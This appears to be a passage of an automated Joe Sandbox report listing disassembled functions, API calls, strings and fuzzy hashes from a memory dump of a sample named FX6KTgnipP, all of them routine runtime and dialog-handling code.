                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 35d90f93c2d8923292c448fc34c9d065ace71762b7f7b255ea10fb9c687b3923
                                                                                                                                                                            • Instruction ID: dec628c81de5e7981a41f9a219e7b8c5ae665313b37075c6c1628f548e753ca0
                                                                                                                                                                            • Opcode Fuzzy Hash: 35d90f93c2d8923292c448fc34c9d065ace71762b7f7b255ea10fb9c687b3923
                                                                                                                                                                            • Instruction Fuzzy Hash: 295123315093D64FC711EF28C4449BEFFF0AE9A31DF0A4999E8D54B142D230EA9ACB52
                                                                                                                                                                            Function 00255F0B Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 66c087c05f726911fb12e8e73f403b84da2aea948485a364c16f959b7298c5db
                                                                                                                                                                            • Instruction ID: 170ba9ddff9629814177c14f48431290aeaac1d24d56984eb033b911f0837419
                                                                                                                                                                            • Opcode Fuzzy Hash: 66c087c05f726911fb12e8e73f403b84da2aea948485a364c16f959b7298c5db
                                                                                                                                                                            • Instruction Fuzzy Hash: 8451DEB1A087119FC758CF29D48055AF7E1BF88314F058A2EF899E7740DB30E959CB9A
                                                                                                                                                                            Function 0025A008 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                                            • Instruction ID: 4aba20a24c417d24ebfbc260908a45b83bb6ca7d9ef0e1362e76bca19fe05efe
                                                                                                                                                                            • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                                                                                                            • Instruction Fuzzy Hash: 083114B16247168FCB14DF28C85266EBBD0FB95301F104A2DE89AC3342C375E829CF96
                                                                                                                                                                            Function 00247CBA Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                                                                                                            • Instruction ID: f3ffc2168ede8788e73a279f17719b7f2fdca140488e62e85a305887a74db8fe
                                                                                                                                                                            • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                                                                                                            • Instruction Fuzzy Hash: 1F41F630525B11CFC71EDF24D495AA6B7E4FF4A701B1248AFD46A8B221EB30E608CF59
                                                                                                                                                                            Function 002692D0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                            • Instruction ID: deb626963341a067402fc40c2b3b55bf07037600b228465a8a8536c5a5eaab02
                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11087726418343D7148E2ED4F46BAB39DEAC632076C42FAD1524F7D8DA32E9F59A00
                                                                                                                                                                            Function 00253EAA Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00253EEA
                                                                                                                                                                              • Part of subcall function 0024F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0024F6CD
                                                                                                                                                                              • Part of subcall function 002589ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,0028E088,?,00000007,002533E2,?,?,00000050,6294DA82), ref: 00258A0A
                                                                                                                                                                            • _strlen.LIBCMT ref: 00253F0B
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,0028919C,?), ref: 00253F64
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00253F9A
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00253FA6
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00254051
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00254081
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 002540B0
                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 002540B8
                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 002540C3
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 002540F3
                                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00254165
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                            • String ID: I=uqI&$$%s:$CAPTION$d
                                                                                                                                                                            • API String ID: 2407758923-2096536411
                                                                                                                                                                            • Opcode ID: ab42ecc70bdbedfee03202904e4e6934992d244188082b857fd2dcee1432cfb4
                                                                                                                                                                            • Instruction ID: 278b4f6729ab39f1906178e42a1b065b895a5f56276fbe8b106214a46e852acd
                                                                                                                                                                            • Opcode Fuzzy Hash: ab42ecc70bdbedfee03202904e4e6934992d244188082b857fd2dcee1432cfb4
                                                                                                                                                                            • Instruction Fuzzy Hash: 00818C72518301AFD714DF68CD89B6FBBE9EB88705F00491EF98993290D730E959CB52
                                                                                                                                                                            Function 002661A7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(002960E0,00000FA0,?,?,00266185), ref: 002661B3
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00266185), ref: 002661BE
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00266185), ref: 002661CF
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002661E1
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002661EF
                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00266185), ref: 00266212
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(002960E0,00000007,?,?,00266185), ref: 00266235
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00266185), ref: 00266245
                                                                                                                                                                            Strings
                                                                                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 002661B9
                                                                                                                                                                            • kernel32.dll, xrefs: 002661CA
                                                                                                                                                                            • SleepConditionVariableCS, xrefs: 002661DB
                                                                                                                                                                            • WakeAllConditionVariable, xrefs: 002661E7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                            • API String ID: 2565136772-3242537097
                                                                                                                                                                            • Opcode ID: 3a912430035708e741b38ed9d679df1cbc15483e25b0aa0d82bb6ee4fb814a35
                                                                                                                                                                            • Instruction ID: d5ef7841bd71f67f20bc2a8357e92c78c3f0a5e09271e6e777668276f3b9bdc3
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a912430035708e741b38ed9d679df1cbc15483e25b0aa0d82bb6ee4fb814a35
                                                                                                                                                                            • Instruction Fuzzy Hash: 9401D870660312EFDB211FB1BC5DF1A3A98FB05B41B11442AFC1DD2250DA70C8A08AB0
                                                                                                                                                                            Function 002737D2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 00273816
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 002733CE
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 002733E0
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 002733F2
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 00273404
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 00273416
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 00273428
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 0027343A
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 0027344C
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 0027345E
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 00273470
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 00273482
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 00273494
                                                                                                                                                                              • Part of subcall function 002733B1: _free.LIBCMT ref: 002734A6
                                                                                                                                                                            • _free.LIBCMT ref: 0027380B
                                                                                                                                                                              • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
                                                                                                                                                                              • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
                                                                                                                                                                            • _free.LIBCMT ref: 0027382D
                                                                                                                                                                            • _free.LIBCMT ref: 00273842
                                                                                                                                                                            • _free.LIBCMT ref: 0027384D
                                                                                                                                                                            • _free.LIBCMT ref: 0027386F
                                                                                                                                                                            • _free.LIBCMT ref: 00273882
                                                                                                                                                                            • _free.LIBCMT ref: 00273890
                                                                                                                                                                            • _free.LIBCMT ref: 0027389B
                                                                                                                                                                            • _free.LIBCMT ref: 002738D3
                                                                                                                                                                            • _free.LIBCMT ref: 002738DA
                                                                                                                                                                            • _free.LIBCMT ref: 002738F7
                                                                                                                                                                            • _free.LIBCMT ref: 0027390F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                            • Opcode ID: 1baabf8269a69f340d45b7782da4b6ceb2b2514859a7087aecbef9b88b65d288
                                                                                                                                                                            • Instruction ID: 4071eff58a5066b47f575844a1987e9aeb7e315452194a618a1e48778b823f66
                                                                                                                                                                            • Opcode Fuzzy Hash: 1baabf8269a69f340d45b7782da4b6ceb2b2514859a7087aecbef9b88b65d288
                                                                                                                                                                            • Instruction Fuzzy Hash: 68317032524206DFEB20EE39D885B5AB3E9EF00310F14C4A9F45CD7151DEB1AE68EB11
                                                                                                                                                                            Function 0025D912 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025D919
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025D97B
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025D99A
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025D9B6
                                                                                                                                                                            • _strlen.LIBCMT ref: 0025DA14
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,0027D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 0025DA2D
                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 0025DA54
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                                                                                                                                                            • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                            • API String ID: 1185167184-1533471033
                                                                                                                                                                            • Opcode ID: 99f27f7beeece1d4e2d1e94d4a797726003b2a9900c1535353c709000944e23a
                                                                                                                                                                            • Instruction ID: 7c4f86cc0a8aa2f23b68fa3f19548c79b99e8d76f9f9b3d99aedefe39c7df17d
                                                                                                                                                                            • Opcode Fuzzy Hash: 99f27f7beeece1d4e2d1e94d4a797726003b2a9900c1535353c709000944e23a
                                                                                                                                                                            • Instruction Fuzzy Hash: 64515371D20219DFEB14EBA0CC46BEEBBB9EF05311F140019E905BB181DB705EA9CBA5
                                                                                                                                                                            Function 00263796 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 002637C4
                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000080), ref: 002637F0
                                                                                                                                                                              • Part of subcall function 00258DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00250E3F,?,?,?,00000046,00251ECE,00000046,?,exe,00000046), ref: 00258DBA
                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0026380C
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00263823
                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00263837
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00263860
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00263867
                                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00263870
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                            • String ID: @U=u$STATIC
                                                                                                                                                                            • API String ID: 3820355801-590614257
                                                                                                                                                                            • Opcode ID: 8ac744ec29ebec19d8ca7ec21cfe6d81e4d9960f8b75148121ba1511a8416372
                                                                                                                                                                            • Instruction ID: 3fcad01204384e937ec0b6a99d2d3454ab938c4e2e2f02a911d74d8fd17ab60c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ac744ec29ebec19d8ca7ec21cfe6d81e4d9960f8b75148121ba1511a8416372
                                                                                                                                                                            • Instruction Fuzzy Hash: D62146721643117BE620AF34EC4EFEF729CAF45700F010026FE45A70D1DB308A554AA9
                                                                                                                                                                            Function 002606D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00260720
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,000103D3), ref: 00260747
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,13050D28), ref: 00260760
                                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 0026077C
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00260790
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002607A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Item$DialogTextWindow
                                                                                                                                                                            • String ID: @U=u$LICENSEDLG$J&
                                                                                                                                                                            • API String ID: 3077722735-3420589309
                                                                                                                                                                            • Opcode ID: ccc1496062da74fadc7afc812689ca0c554edcc4655a234e2a4badeecd770d35
                                                                                                                                                                            • Instruction ID: d818ebf318edc553205194809fe3f970b51d0591a6382de2a3c103c4e866bf9b
                                                                                                                                                                            • Opcode Fuzzy Hash: ccc1496062da74fadc7afc812689ca0c554edcc4655a234e2a4badeecd770d35
                                                                                                                                                                            • Instruction Fuzzy Hash: 99213631375215BBD6026F21EC8CFBB7B6CEB4A745F040005F600A20D0D7A1AEA0DB35
                                                                                                                                                                            Function 0026FF11 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF25
                                                                                                                                                                              • Part of subcall function 002703D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?), ref: 002703EA
                                                                                                                                                                              • Part of subcall function 002703D4: GetLastError.KERNEL32(?,?,00273546,?,00000000,?,00000000,?,0027356D,?,00000007,?,?,0027396A,?,?), ref: 002703FC
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF31
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF3C
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF47
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF52
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF5D
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF68
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF73
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF7E
                                                                                                                                                                            • _free.LIBCMT ref: 0026FF8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                            • Opcode ID: 097340638f6ec69d5e36f65ab14fb562bdb5bfc4cfccd3ec444d9bc076b29c7b
                                                                                                                                                                            • Instruction ID: a2ff789221691e59b1152c90da45baff714eb167f870cc54525a856cc6707866
                                                                                                                                                                            • Opcode Fuzzy Hash: 097340638f6ec69d5e36f65ab14fb562bdb5bfc4cfccd3ec444d9bc076b29c7b
                                                                                                                                                                            • Instruction Fuzzy Hash: F811A47612414CFFDF41EF95D982CDD3BA5EF04350B1180E1BA089B262DAB1EA64DF80
